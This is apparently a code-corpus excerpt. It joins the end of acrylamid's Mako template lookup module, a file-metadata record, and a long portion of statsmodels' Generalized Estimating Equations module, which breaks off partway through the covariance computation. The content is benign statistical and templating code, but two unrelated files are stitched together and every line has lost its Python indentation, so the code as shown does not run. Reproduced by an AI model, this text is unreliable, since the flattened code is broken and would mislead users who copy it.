includes = re.compile(r'<%namespace file="([^"]+)" import="[^"]+" />')
def __init__(self, *args, **kwargs):
# remember already resolved templates -> modified state
# TODO don't assume macros.html never changes
self.modified = {'macros.html': False}
# requested template -> parents as flat list
self.resolved = defaultdict(set)
# assets in the form of theme/base.html -> (*args, **kwargs)
self.assets = defaultdict(list)
super(ExtendedLookup, self).__init__(*args, **kwargs)
def get_template(self, uri):
"""This is stolen and truncated from mako.lookup:TemplateLookup."""
u = re.sub(r'^/+', '', uri)
for dir in self.directories:
filename = posixpath.normpath(posixpath.join(dir, u))
if os.path.isfile(filename):
return self._load(filename, uri)
else:
raise exceptions.TopLevelLookupException(
"Cant locate template for uri %r" % uri)
def _load(self, filename, uri):
deps = [uri, ]
while len(deps) > 0:
child = deps.pop()
if child in self.modified:
continue
for directory in self.directories:
filename = posixpath.normpath(posixpath.join(directory, child))
if isfile(filename):
break
p = self.modulename_callable(filename, child)
try:
modified = getmtime(filename) > getmtime(p)
except OSError:
modified = True
self.modified[child] = modified
with io.open(filename, encoding='utf-8') as fp:
source = fp.read()
parents = chain(self.inherits.finditer(source), self.includes.finditer(source))
for match in parents:
self.resolved[child].add(match.group(1))
deps.append(match.group(1))
# TODO: definitely an ugly way (= side effect) to get the byte code
tt = super(ExtendedLookup, self)._load(filename, child)
for args, kwargs in find_assets(tt):
self.assets[uri].append((args, kwargs))
# already cached due to the side effect above
return self._collection[uri]
class Environment(AbstractEnvironment):
extension = ['.html', '.mako']
def __init__(self, layoutdirs, cachedir):
self._mako = ExtendedLookup(
directories=layoutdirs,
module_directory=cachedir,
# similar to mako.template.Template.__init__ but with
# leading cache_ for the acrylamid cache
modulename_callable=lambda filename, uri:\
os.path.join(os.path.abspath(cachedir), 'cache_' +
os.path.normpath(uri.lstrip('/')) + '.py'),
input_encoding='utf-8')
self.filters = {}
def register(self, name, func):
self.filters[name] = func
def fromfile(self, env, path):
return Template(env, path, self._mako.get_template(path))
def extend(self, path):
self._mako.directories.append(path)
@property
def loader(self):
return self._mako
class Template(AbstractTemplate, Mixin):
def render(self, **kw):
# we inject the filter functions as top-level objects into the template,
# that's probably the only way that works with Mako
kw.update(self.engine.filters)
buf = io.StringIO()
ctx = runtime.Context(buf, **kw)
self.template.render_context(ctx)
return buf
# For debugging template compilation:
# TODO: Integrate this with acrylamid somehow
#from mako import exceptions as mako_exceptions
#try:
# return self.template.render(**kw)
#except:
# print mako_exceptions.text_error_template().render()
# return unicode(mako_exceptions.html_error_template().render())
|
markvl/acrylamid
|
acrylamid/templates/mako.py
|
Python
|
bsd-2-clause
| 5,841
|
[
"VisIt"
] |
b53e2ac6afc3b147dc0080112ade1fad85d2f16ac09532b3a0bea6f9306cad97
|
"""
Procedures for fitting marginal regression models to dependent data
using Generalized Estimating Equations.
References
----------
KY Liang and S Zeger. "Longitudinal data analysis using
generalized linear models". Biometrika (1986) 73 (1): 13-22.
S Zeger and KY Liang. "Longitudinal Data Analysis for Discrete and
Continuous Outcomes". Biometrics Vol. 42, No. 1 (Mar., 1986),
pp. 121-130
A Rotnitzky and NP Jewell (1990). "Hypothesis testing of regression
parameters in semiparametric generalized linear models for cluster
correlated data", Biometrika, 77, 485-497.
Xu Guo and Wei Pan (2002). "Small sample performance of the score
test in GEE".
http://www.sph.umn.edu/faculty1/wp-content/uploads/2012/11/rr2002-013.pdf
LA Mancl LA, TA DeRouen (2001). A covariance estimator for GEE with
improved small-sample properties. Biometrics. 2001 Mar;57(1):126-34.
"""
from statsmodels.compat.python import lzip
from statsmodels.compat.pandas import Appender
import numpy as np
from scipy import stats
import pandas as pd
import patsy
from collections import defaultdict
from statsmodels.tools.decorators import cache_readonly
import statsmodels.base.model as base
# used for wrapper:
import statsmodels.regression.linear_model as lm
import statsmodels.base.wrapper as wrap
from statsmodels.genmod import families
from statsmodels.genmod.generalized_linear_model import GLM, GLMResults
from statsmodels.genmod import cov_struct as cov_structs
import statsmodels.genmod.families.varfuncs as varfuncs
from statsmodels.genmod.families.links import Link
from statsmodels.tools.sm_exceptions import (ConvergenceWarning,
DomainWarning,
IterationLimitWarning,
ValueWarning)
import warnings
from statsmodels.graphics._regressionplots_doc import (
_plot_added_variable_doc,
_plot_partial_residuals_doc,
_plot_ceres_residuals_doc)
from statsmodels.discrete.discrete_margins import (
_get_margeff_exog, _check_margeff_args, _effects_at, margeff_cov_with_se,
_check_at_is_all, _transform_names, _check_discrete_args,
_get_dummy_index, _get_count_index)
class ParameterConstraint(object):
"""
A class for managing linear equality constraints for a parameter
vector.
"""
def __init__(self, lhs, rhs, exog):
"""
Parameters
----------
lhs : ndarray
A q x p matrix which is the left hand side of the
constraint lhs * param = rhs. The number of constraints is
q >= 1 and p is the dimension of the parameter vector.
rhs : ndarray
A 1-dimensional vector of length q which is the right hand
side of the constraint equation.
exog : ndarray
The n x p exogenous data for the full model.
"""
# In case a row or column vector is passed (patsy linear
# constraints passes a column vector).
rhs = np.atleast_1d(rhs.squeeze())
if rhs.ndim > 1:
raise ValueError("The right hand side of the constraint "
"must be a vector.")
if len(rhs) != lhs.shape[0]:
raise ValueError("The number of rows of the left hand "
"side constraint matrix L must equal "
"the length of the right hand side "
"constraint vector R.")
self.lhs = lhs
self.rhs = rhs
# The columns of lhs0 are an orthogonal basis for the
# orthogonal complement to row(lhs), the columns of lhs1 are
# an orthogonal basis for row(lhs). The columns of lhsf =
# [lhs0, lhs1] are mutually orthogonal.
lhs_u, lhs_s, lhs_vt = np.linalg.svd(lhs.T, full_matrices=1)
self.lhs0 = lhs_u[:, len(lhs_s):]
self.lhs1 = lhs_u[:, 0:len(lhs_s)]
self.lhsf = np.hstack((self.lhs0, self.lhs1))
# param0 is one solution to the underdetermined system
# L * param = R.
self.param0 = np.dot(self.lhs1, np.dot(lhs_vt, self.rhs) /
lhs_s)
self._offset_increment = np.dot(exog, self.param0)
self.orig_exog = exog
self.exog_fulltrans = np.dot(exog, self.lhsf)
def offset_increment(self):
"""
Returns a vector that should be added to the offset vector to
accommodate the constraint.
Parameters
----------
exog : array_like
The exogenous data for the model.
"""
return self._offset_increment
def reduced_exog(self):
"""
Returns a linearly transformed exog matrix whose columns span
the constrained model space.
Parameters
----------
exog : array_like
The exogenous data for the model.
"""
return self.exog_fulltrans[:, 0:self.lhs0.shape[1]]
def restore_exog(self):
"""
Returns the full exog matrix before it was reduced to
satisfy the constraint.
"""
return self.orig_exog
def unpack_param(self, params):
"""
Converts the parameter vector `params` from reduced to full
coordinates.
"""
return self.param0 + np.dot(self.lhs0, params)
def unpack_cov(self, bcov):
"""
Converts the covariance matrix `bcov` from reduced to full
coordinates.
"""
return np.dot(self.lhs0, np.dot(bcov, self.lhs0.T))
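# Illustrative sketch (not part of statsmodels): enforcing params[0] == params[1] in a
# three-parameter model corresponds to lhs * params = rhs with
#     lhs = np.array([[1., -1., 0.]]);  rhs = np.array([0.])
#     pc = ParameterConstraint(lhs, rhs, exog)
# The model is then fit on pc.reduced_exog() with pc.offset_increment() added to the
# offset, and pc.unpack_param() / pc.unpack_cov() map estimates back to full coordinates.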
_gee_init_doc = """
Marginal regression model fit using Generalized Estimating Equations.
GEE can be used to fit Generalized Linear Models (GLMs) when the
data have a grouped structure, and the observations are possibly
correlated within groups but not between groups.
Parameters
----------
endog : array_like
1d array of endogenous values (i.e. responses, outcomes,
dependent variables, or 'Y' values).
exog : array_like
2d array of exogenous values (i.e. covariates, predictors,
independent variables, regressors, or 'X' values). A `nobs x
k` array where `nobs` is the number of observations and `k` is
the number of regressors. An intercept is not included by
default and should be added by the user. See
`statsmodels.tools.add_constant`.
groups : array_like
A 1d array of length `nobs` containing the group labels.
time : array_like
A 2d array of time (or other index) values, used by some
dependence structures to define similarity relationships among
observations within a cluster.
family : family class instance
%(family_doc)s
cov_struct : CovStruct class instance
The default is Independence. To specify an exchangeable
structure use cov_struct = Exchangeable(). See
statsmodels.genmod.cov_struct.CovStruct for more
information.
offset : array_like
An offset to be included in the fit. If provided, must be
an array whose length is the number of rows in exog.
dep_data : array_like
Additional data passed to the dependence structure.
constraint : (ndarray, ndarray)
If provided, the constraint is a tuple (L, R) such that the
model parameters are estimated under the constraint L *
param = R, where L is a q x p matrix and R is a
q-dimensional vector. If constraint is provided, a score
test is performed to compare the constrained model to the
unconstrained model.
update_dep : bool
If true, the dependence parameters are optimized, otherwise
they are held fixed at their starting values.
weights : array_like
An array of case weights to use in the analysis.
%(extra_params)s
See Also
--------
statsmodels.genmod.families.family
:ref:`families`
:ref:`links`
Notes
-----
Only the following combinations make sense for family and link ::
             + ident log logit probit cloglog pow opow nbinom loglog logc
Gaussian     |   x    x                        x
inv Gaussian |   x    x                        x
binomial     |   x    x    x     x       x     x   x            x     x
Poisson      |   x    x                        x
neg binomial |   x    x                        x         x
gamma        |   x    x                        x
Not all of these link functions are currently available.
Endog and exog are references so that if the data they refer
to are already arrays and these arrays are changed, endog and
exog will change.
The "robust" covariance type is the standard "sandwich estimator"
(e.g. Liang and Zeger (1986)). It is the default here and in most
other packages. The "naive" estimator gives smaller standard
errors, but is only correct if the working correlation structure
is correctly specified. The "bias reduced" estimator of Mancl and
DeRouen (Biometrics, 2001) reduces the downward bias of the robust
estimator.
The robust covariance provided here follows Liang and Zeger (1986)
and agrees with R's gee implementation. To obtain the robust
standard errors reported in Stata, multiply by sqrt(N / (N - g)),
where N is the total sample size, and g is the average group size.
%(notes)s
Examples
--------
%(example)s
"""
_gee_nointercept = """
The nominal and ordinal GEE models should not have an intercept
(either implicit or explicit). Use "0 + " in a formula to
suppress the intercept.
"""
_gee_family_doc = """\
The default is Gaussian. To specify the binomial
distribution use `family=sm.families.Binomial()`. Each family
can take a link instance as an argument. See
statsmodels.genmod.families.family for more information."""
_gee_ordinal_family_doc = """\
The only family supported is `Binomial`. The default `Logit`
link may be replaced with `probit` if desired."""
_gee_nominal_family_doc = """\
The default value `None` uses a multinomial logit family
specifically designed for use with GEE. Setting this
argument to a non-default value is not currently supported."""
_gee_fit_doc = """
Fits a marginal regression model using generalized estimating
equations (GEE).
Parameters
----------
maxiter : int
The maximum number of iterations
ctol : float
The convergence criterion for stopping the Gauss-Seidel
iterations
start_params : array_like
A vector of starting values for the regression
coefficients. If None, a default is chosen.
params_niter : int
The number of Gauss-Seidel updates of the mean structure
parameters that take place prior to each update of the
dependence structure.
first_dep_update : int
No dependence structure updates occur before this
iteration number.
cov_type : str
One of "robust", "naive", or "bias_reduced".
ddof_scale : scalar or None
The scale parameter is estimated as the sum of squared
Pearson residuals divided by `N - ddof_scale`, where N
is the total sample size. If `ddof_scale` is None, the
number of covariates (including an intercept if present)
is used.
scaling_factor : scalar
The estimated covariance of the parameter estimates is
scaled by this value. Default is 1, Stata uses N / (N - g),
where N is the total sample size and g is the average group
size.
scale : str or float, optional
`scale` can be None, 'X2', or a float
If a float, its value is used as the scale parameter.
The default value is None, which uses `X2` (Pearson's
chi-square) for Gamma, Gaussian, and Inverse Gaussian.
The default is 1 for the Binomial and Poisson families.
Returns
-------
An instance of the GEEResults class or subclass
Notes
-----
If convergence difficulties occur, increase the values of
`first_dep_update` and/or `params_niter`. Setting
`first_dep_update` to a greater value (e.g. ~10-20) causes the
algorithm to move close to the GLM solution before attempting
to identify the dependence structure.
For the Gaussian family, there is no benefit to setting
`params_niter` to a value greater than 1, since the mean
structure parameters converge in one step.
"""
_gee_results_doc = """
Attributes
----------
cov_params_default : ndarray
default covariance of the parameter estimates. Is chosen among one
of the following three based on `cov_type`
cov_robust : ndarray
covariance of the parameter estimates that is robust
cov_naive : ndarray
covariance of the parameter estimates that is not robust to
correlation or variance misspecification
cov_robust_bc : ndarray
covariance of the parameter estimates that is robust and bias
reduced
converged : bool
indicator for convergence of the optimization.
True if the norm of the score is smaller than a threshold
cov_type : str
string indicating whether a "robust", "naive" or "bias_reduced"
covariance is used as default
fit_history : dict
Contains information about the iterations.
fittedvalues : ndarray
Linear predicted values for the fitted model.
dot(exog, params)
model : class instance
Pointer to GEE model instance that called `fit`.
normalized_cov_params : ndarray
See GEE docstring
params : ndarray
The coefficients of the fitted model. Note that
interpretation of the coefficients often depends on the
distribution family and the data.
scale : float
The estimate of the scale / dispersion for the model fit.
See GEE.fit for more information.
score_norm : float
norm of the score at the end of the iterative estimation.
bse : ndarray
The standard errors of the fitted GEE parameters.
"""
_gee_example = """
Logistic regression with autoregressive working dependence:
>>> import statsmodels.api as sm
>>> family = sm.families.Binomial()
>>> va = sm.cov_struct.Autoregressive()
>>> model = sm.GEE(endog, exog, group, family=family, cov_struct=va)
>>> result = model.fit()
>>> print(result.summary())
Use formulas to fit a Poisson GLM with independent working
dependence:
>>> import statsmodels.api as sm
>>> fam = sm.families.Poisson()
>>> ind = sm.cov_struct.Independence()
>>> model = sm.GEE.from_formula("y ~ age + trt + base", "subject",
data, cov_struct=ind, family=fam)
>>> result = model.fit()
>>> print(result.summary())
Equivalent, using the formula API:
>>> import statsmodels.api as sm
>>> import statsmodels.formula.api as smf
>>> fam = sm.families.Poisson()
>>> ind = sm.cov_struct.Independence()
>>> model = smf.gee("y ~ age + trt + base", "subject",
data, cov_struct=ind, family=fam)
>>> result = model.fit()
>>> print(result.summary())
"""
_gee_ordinal_example = """
Fit an ordinal regression model using GEE, with "global
odds ratio" dependence:
>>> import statsmodels.api as sm
>>> gor = sm.cov_struct.GlobalOddsRatio("ordinal")
>>> model = sm.OrdinalGEE(endog, exog, groups, cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
Using formulas:
>>> import statsmodels.formula.api as smf
>>> model = smf.ordinal_gee("y ~ 0 + x1 + x2", groups, data,
cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
"""
_gee_nominal_example = """
Fit a nominal regression model using GEE:
>>> import statsmodels.api as sm
>>> import statsmodels.formula.api as smf
>>> gor = sm.cov_struct.GlobalOddsRatio("nominal")
>>> model = sm.NominalGEE(endog, exog, groups, cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
Using formulas:
>>> import statsmodels.api as sm
>>> model = sm.NominalGEE.from_formula("y ~ 0 + x1 + x2", groups,
data, cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
Using the formula API:
>>> import statsmodels.formula.api as smf
>>> model = smf.nominal_gee("y ~ 0 + x1 + x2", groups, data,
cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
"""
def _check_args(endog, exog, groups, time, offset, exposure):
if endog.size != exog.shape[0]:
raise ValueError("Leading dimension of 'exog' should match "
"length of 'endog'")
if groups.size != endog.size:
raise ValueError("'groups' and 'endog' should have the same size")
if time is not None and (time.size != endog.size):
raise ValueError("'time' and 'endog' should have the same size")
if offset is not None and (offset.size != endog.size):
raise ValueError("'offset and 'endog' should have the same size")
if exposure is not None and (exposure.size != endog.size):
raise ValueError("'exposure' and 'endog' should have the same size")
class GEE(GLM):
__doc__ = (
" Marginal Regression Model using Generalized Estimating "
"Equations.\n" + _gee_init_doc %
{'extra_params': base._missing_param_doc,
'family_doc': _gee_family_doc,
'example': _gee_example,
'notes': ""})
cached_means = None
def __init__(self, endog, exog, groups, time=None, family=None,
cov_struct=None, missing='none', offset=None,
exposure=None, dep_data=None, constraint=None,
update_dep=True, weights=None, **kwargs):
if family is not None:
if not isinstance(family.link, tuple(family.safe_links)):
import warnings
msg = ("The {0} link function does not respect the "
"domain of the {1} family.")
warnings.warn(msg.format(family.link.__class__.__name__,
family.__class__.__name__),
DomainWarning)
groups = np.asarray(groups) # in case groups is pandas
if "missing_idx" in kwargs and kwargs["missing_idx"] is not None:
# If here, we are entering from super.from_formula; missing
# has already been dropped from endog and exog, but not from
# the other variables.
ii = ~kwargs["missing_idx"]
groups = groups[ii]
if time is not None:
time = time[ii]
if offset is not None:
offset = offset[ii]
if exposure is not None:
exposure = exposure[ii]
del kwargs["missing_idx"]
_check_args(endog, exog, groups, time, offset, exposure)
self.missing = missing
self.dep_data = dep_data
self.constraint = constraint
self.update_dep = update_dep
self._fit_history = defaultdict(list)
# Pass groups, time, offset, and dep_data so they are
# processed for missing data along with endog and exog.
# Calling super creates self.exog, self.endog, etc. as
# ndarrays and the original exog, endog, etc. are
# self.data.endog, etc.
super(GEE, self).__init__(endog, exog, groups=groups,
time=time, offset=offset,
exposure=exposure, weights=weights,
dep_data=dep_data, missing=missing,
family=family, **kwargs)
self._init_keys.extend(["update_dep", "constraint", "family",
"cov_struct"])
# Handle the family argument
if family is None:
family = families.Gaussian()
else:
if not issubclass(family.__class__, families.Family):
raise ValueError("GEE: `family` must be a genmod "
"family instance")
self.family = family
# Handle the cov_struct argument
if cov_struct is None:
cov_struct = cov_structs.Independence()
else:
if not issubclass(cov_struct.__class__, cov_structs.CovStruct):
raise ValueError("GEE: `cov_struct` must be a genmod "
"cov_struct instance")
self.cov_struct = cov_struct
# Handle the constraint
self.constraint = None
if constraint is not None:
if len(constraint) != 2:
raise ValueError("GEE: `constraint` must be a 2-tuple.")
if constraint[0].shape[1] != self.exog.shape[1]:
raise ValueError(
"GEE: the left hand side of the constraint must have "
"the same number of columns as the exog matrix.")
self.constraint = ParameterConstraint(constraint[0],
constraint[1],
self.exog)
if self._offset_exposure is not None:
self._offset_exposure += self.constraint.offset_increment()
else:
self._offset_exposure = (
self.constraint.offset_increment().copy())
self.exog = self.constraint.reduced_exog()
# Create list of row indices for each group
group_labels, ix = np.unique(self.groups, return_inverse=True)
se = pd.Series(index=np.arange(len(ix)), dtype="int")
gb = se.groupby(ix).groups
dk = [(lb, np.asarray(gb[k])) for k, lb in enumerate(group_labels)]
self.group_indices = dict(dk)
self.group_labels = group_labels
# Convert the data to the internal representation, which is a
# list of arrays, corresponding to the groups.
self.endog_li = self.cluster_list(self.endog)
self.exog_li = self.cluster_list(self.exog)
if self.weights is not None:
self.weights_li = self.cluster_list(self.weights)
self.num_group = len(self.endog_li)
# Time defaults to a 1d grid with equal spacing
if self.time is not None:
if self.time.ndim == 1:
self.time = self.time[:, None]
self.time_li = self.cluster_list(self.time)
else:
self.time_li = \
[np.arange(len(y), dtype=np.float64)[:, None]
for y in self.endog_li]
self.time = np.concatenate(self.time_li)
if (self._offset_exposure is None or
(np.isscalar(self._offset_exposure) and
self._offset_exposure == 0.)):
self.offset_li = None
else:
self.offset_li = self.cluster_list(self._offset_exposure)
if constraint is not None:
self.constraint.exog_fulltrans_li = \
self.cluster_list(self.constraint.exog_fulltrans)
self.family = family
self.cov_struct.initialize(self)
# Total sample size
group_ns = [len(y) for y in self.endog_li]
self.nobs = sum(group_ns)
# The following are column-based, not rank-based; see GH#1928
self.df_model = self.exog.shape[1] - 1 # assumes constant
self.df_resid = self.nobs - self.exog.shape[1]
# Skip the covariance updates if all groups have a single
# observation (reduces to fitting a GLM).
maxgroup = max([len(x) for x in self.endog_li])
if maxgroup == 1:
self.update_dep = False
# Override to allow groups and time to be passed as variable
# names.
@classmethod
def from_formula(cls, formula, groups, data, subset=None,
time=None, offset=None, exposure=None,
*args, **kwargs):
"""
Create a GEE model instance from a formula and dataframe.
Parameters
----------
formula : str or generic Formula object
The formula specifying the model
groups : array_like or string
Array of grouping labels. If a string, this is the name
of a variable in `data` that contains the grouping labels.
data : array_like
The data for the model.
subset : array_like
An array-like object of booleans, integers, or index
values that indicate the subset of the data to used when
fitting the model.
time : array_like or string
The time values, used for dependence structures involving
distances between observations. If a string, this is the
name of a variable in `data` that contains the time
values.
offset : array_like or string
The offset values, added to the linear predictor. If a
string, this is the name of a variable in `data` that
contains the offset values.
exposure : array_like or string
The exposure values, only used if the link function is the
logarithm function, in which case the log of `exposure`
is added to the offset (if any). If a string, this is the
name of a variable in `data` that contains the offset
values.
%(missing_param_doc)s
args : extra arguments
These are passed to the model
kwargs : extra keyword arguments
These are passed to the model with two exceptions. `dep_data`
is processed as described below. The ``eval_env`` keyword is
passed to patsy. It can be either a
:class:`patsy:patsy.EvalEnvironment` object or an integer
indicating the depth of the namespace to use. For example, the
default ``eval_env=0`` uses the calling namespace.
If you wish to use a "clean" environment set ``eval_env=-1``.
Optional arguments
------------------
dep_data : str or array_like
Data used for estimating the dependence structure. See
specific dependence structure classes (e.g. Nested) for
details. If `dep_data` is a string, it is interpreted as
a formula that is applied to `data`. If it is an array, it
must be an array of strings corresponding to column names in
`data`. Otherwise it must be an array-like with the same
number of rows as data.
Returns
-------
model : GEE model instance
Notes
-----
`data` must define __getitem__ with the keys in the formula
terms args and kwargs are passed on to the model
instantiation. E.g., a numpy structured or rec array, a
dictionary, or a pandas DataFrame.
""" % {'missing_param_doc': base._missing_param_doc}
groups_name = "Groups"
if isinstance(groups, str):
groups_name = groups
groups = data[groups]
if isinstance(time, str):
time = data[time]
if isinstance(offset, str):
offset = data[offset]
if isinstance(exposure, str):
exposure = data[exposure]
dep_data = kwargs.get("dep_data")
dep_data_names = None
if dep_data is not None:
if isinstance(dep_data, str):
dep_data = patsy.dmatrix(dep_data, data,
return_type='dataframe')
dep_data_names = dep_data.columns.tolist()
else:
dep_data_names = list(dep_data)
dep_data = data[dep_data]
kwargs["dep_data"] = np.asarray(dep_data)
family = None
if "family" in kwargs:
family = kwargs["family"]
del kwargs["family"]
model = super(GEE, cls).from_formula(formula, data=data, subset=subset,
groups=groups, time=time,
offset=offset,
exposure=exposure,
family=family,
*args, **kwargs)
if dep_data_names is not None:
model._dep_data_names = dep_data_names
model._groups_name = groups_name
return model
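# Illustrative sketch of ``from_formula`` with a ``dep_data`` formula as
# described above; ``df`` and its column names are hypothetical. Here
# ``dep_data`` selects a grouping column used by a Nested covariance
# structure.
#
# >>> import statsmodels.api as sm
# >>> ne = sm.cov_struct.Nested()
# >>> model = sm.GEE.from_formula("y ~ age + trt", groups="subject",
# ...                             data=df, cov_struct=ne,
# ...                             dep_data="0 + clinic")
# >>> result = model.fit()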
def cluster_list(self, array):
"""
Returns `array` split into subarrays corresponding to the
cluster structure.
"""
if array.ndim == 1:
return [np.array(array[self.group_indices[k]])
for k in self.group_labels]
else:
return [np.array(array[self.group_indices[k], :])
for k in self.group_labels]
def compare_score_test(self, submodel):
"""
Perform a score test for the given submodel against this model.
Parameters
----------
submodel : GEEResults instance
A fitted GEE model that is a submodel of this model.
Returns
-------
A dictionary with keys "statistic", "p-value", and "df",
containing the score test statistic, its chi^2 p-value,
and the degrees of freedom used to compute the p-value.
Notes
-----
The score test can be performed without calling 'fit' on the
larger model. The provided submodel must be obtained from a
fitted GEE.
This method performs the same score test as can be obtained by
fitting the GEE with a linear constraint and calling `score_test`
on the results.
References
----------
Xu Guo and Wei Pan (2002). "Small sample performance of the score
test in GEE".
http://www.sph.umn.edu/faculty1/wp-content/uploads/2012/11/rr2002-013.pdf
"""
# Since the model has not been fit, its scaletype has not been
# set. So give it the scaletype of the submodel.
self.scaletype = submodel.model.scaletype
# Check consistency between model and submodel (not a comprehensive
# check)
submod = submodel.model
if self.exog.shape[0] != submod.exog.shape[0]:
msg = "Model and submodel have different numbers of cases."
raise ValueError(msg)
if self.exog.shape[1] == submod.exog.shape[1]:
msg = "Model and submodel have the same number of variables"
warnings.warn(msg)
if not isinstance(self.family, type(submod.family)):
msg = "Model and submodel have different GLM families."
warnings.warn(msg)
if not isinstance(self.cov_struct, type(submod.cov_struct)):
warnings.warn("Model and submodel have different GEE covariance "
"structures.")
if not np.equal(self.weights, submod.weights).all():
msg = "Model and submodel should have the same weights."
warnings.warn(msg)
# Get the positions of the submodel variables in the
# parent model
qm, qc = _score_test_submodel(self, submodel.model)
if qm is None:
msg = "The provided model is not a submodel."
raise ValueError(msg)
# Embed the submodel params into a params vector for the
# parent model
params_ex = np.dot(qm, submodel.params)
# Attempt to preserve the state of the parent model
cov_struct_save = self.cov_struct
import copy
cached_means_save = copy.deepcopy(self.cached_means)
# Get the score vector of the submodel params in
# the parent model
self.cov_struct = submodel.cov_struct
self.update_cached_means(params_ex)
_, score = self._update_mean_params()
if score is None:
msg = "Singular matrix encountered in GEE score test"
warnings.warn(msg, ConvergenceWarning)
return None
if not hasattr(self, "ddof_scale"):
self.ddof_scale = self.exog.shape[1]
if not hasattr(self, "scaling_factor"):
self.scaling_factor = 1
_, ncov1, cmat = self._covmat()
score2 = np.dot(qc.T, score)
try:
amat = np.linalg.inv(ncov1)
except np.linalg.LinAlgError:
amat = np.linalg.pinv(ncov1)
bmat_11 = np.dot(qm.T, np.dot(cmat, qm))
bmat_22 = np.dot(qc.T, np.dot(cmat, qc))
bmat_12 = np.dot(qm.T, np.dot(cmat, qc))
amat_11 = np.dot(qm.T, np.dot(amat, qm))
amat_12 = np.dot(qm.T, np.dot(amat, qc))
try:
ab = np.linalg.solve(amat_11, bmat_12)
except np.linalg.LinAlgError:
ab = np.dot(np.linalg.pinv(amat_11), bmat_12)
score_cov = bmat_22 - np.dot(amat_12.T, ab)
try:
aa = np.linalg.solve(amat_11, amat_12)
except np.linalg.LinAlgError:
aa = np.dot(np.linalg.pinv(amat_11), amat_12)
score_cov -= np.dot(bmat_12.T, aa)
try:
ab = np.linalg.solve(amat_11, bmat_11)
except np.linalg.LinAlgError:
ab = np.dot(np.linalg.pinv(amat_11), bmat_11)
try:
aa = np.linalg.solve(amat_11, amat_12)
except np.linalg.LinAlgError:
aa = np.dot(np.linalg.pinv(amat_11), amat_12)
score_cov += np.dot(amat_12.T, np.dot(ab, aa))
# Attempt to restore state
self.cov_struct = cov_struct_save
self.cached_means = cached_means_save
from scipy.stats.distributions import chi2
try:
sc2 = np.linalg.solve(score_cov, score2)
except np.linalg.LinAlgError:
sc2 = np.dot(np.linalg.pinv(score_cov), score2)
score_statistic = np.dot(score2, sc2)
score_df = len(score2)
score_pvalue = 1 - chi2.cdf(score_statistic, score_df)
return {"statistic": score_statistic,
"df": score_df,
"p-value": score_pvalue}
def estimate_scale(self):
"""
Estimate the dispersion/scale.
"""
if self.scaletype is None:
if isinstance(self.family, (families.Binomial, families.Poisson,
families.NegativeBinomial,
_Multinomial)):
return 1.
elif isinstance(self.scaletype, float):
return np.array(self.scaletype)
endog = self.endog_li
cached_means = self.cached_means
nobs = self.nobs
varfunc = self.family.variance
scale = 0.
fsum = 0.
for i in range(self.num_group):
if len(endog[i]) == 0:
continue
expval, _ = cached_means[i]
sdev = np.sqrt(varfunc(expval))
resid = (endog[i] - expval) / sdev
if self.weights is not None:
f = self.weights_li[i]
scale += np.sum(f * (resid ** 2))
fsum += f.sum()
else:
scale += np.sum(resid ** 2)
fsum += len(resid)
scale /= (fsum * (nobs - self.ddof_scale) / float(nobs))
return scale
def mean_deriv(self, exog, lin_pred):
"""
Derivative of the expected endog with respect to the parameters.
Parameters
----------
exog : array_like
The exogeneous data at which the derivative is computed.
lin_pred : array_like
The values of the linear predictor.
Returns
-------
The value of the derivative of the expected endog with respect
to the parameter vector.
Notes
-----
If there is an offset or exposure, it should be added to
`lin_pred` prior to calling this function.
"""
idl = self.family.link.inverse_deriv(lin_pred)
dmat = exog * idl[:, None]
return dmat
def mean_deriv_exog(self, exog, params, offset_exposure=None):
"""
Derivative of the expected endog with respect to exog.
Parameters
----------
exog : array_like
Values of the independent variables at which the derivative
is calculated.
params : array_like
Parameter values at which the derivative is calculated.
offset_exposure : array_like, optional
Combined offset and exposure.
Returns
-------
The derivative of the expected endog with respect to exog.
"""
lin_pred = np.dot(exog, params)
if offset_exposure is not None:
lin_pred += offset_exposure
idl = self.family.link.inverse_deriv(lin_pred)
dmat = np.outer(idl, params)
return dmat
def _update_mean_params(self):
"""
Returns
-------
update : array_like
The update vector such that params + update is the next
iterate when solving the score equations.
score : array_like
The current value of the score equations, not
incorporating the scale parameter. If desired,
multiply this vector by the scale parameter to
incorporate the scale.
"""
endog = self.endog_li
exog = self.exog_li
weights = getattr(self, "weights_li", None)
cached_means = self.cached_means
varfunc = self.family.variance
bmat, score = 0, 0
for i in range(self.num_group):
expval, lpr = cached_means[i]
resid = endog[i] - expval
dmat = self.mean_deriv(exog[i], lpr)
sdev = np.sqrt(varfunc(expval))
if weights is not None:
w = weights[i]
wresid = resid * w
wdmat = dmat * w[:, None]
else:
wresid = resid
wdmat = dmat
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (wdmat, wresid))
if rslt is None:
return None, None
vinv_d, vinv_resid = tuple(rslt)
bmat += np.dot(dmat.T, vinv_d)
score += np.dot(dmat.T, vinv_resid)
try:
update = np.linalg.solve(bmat, score)
except np.linalg.LinAlgError:
update = np.dot(np.linalg.pinv(bmat), score)
self._fit_history["cov_adjust"].append(
self.cov_struct.cov_adjust)
return update, score
def update_cached_means(self, mean_params):
"""
cached_means should always contain the most recent calculation
of the group-wise mean vectors. This function should be
called every time the regression parameters are changed, to
keep the cached means up to date.
"""
endog = self.endog_li
exog = self.exog_li
offset = self.offset_li
linkinv = self.family.link.inverse
self.cached_means = []
for i in range(self.num_group):
if len(endog[i]) == 0:
continue
lpr = np.dot(exog[i], mean_params)
if offset is not None:
lpr += offset[i]
expval = linkinv(lpr)
self.cached_means.append((expval, lpr))
def _covmat(self):
"""
Returns the sampling covariance matrix of the regression
parameters and related quantities.
Returns
-------
cov_robust : array_like
The robust, or sandwich estimate of the covariance, which
is meaningful even if the working covariance structure is
incorrectly specified.
cov_naive : array_like
The model-based estimate of the covariance, which is
meaningful if the covariance structure is correctly
specified.
cmat : array_like
The center matrix of the sandwich expression, used in
obtaining score test results.
"""
endog = self.endog_li
exog = self.exog_li
weights = getattr(self, "weights_li", None)
varfunc = self.family.variance
cached_means = self.cached_means
# Calculate the naive (model-based) and robust (sandwich)
# covariances.
bmat, cmat = 0, 0
for i in range(self.num_group):
expval, lpr = cached_means[i]
resid = endog[i] - expval
dmat = self.mean_deriv(exog[i], lpr)
sdev = np.sqrt(varfunc(expval))
if weights is not None:
w = weights[i]
wresid = resid * w
wdmat = dmat * w[:, None]
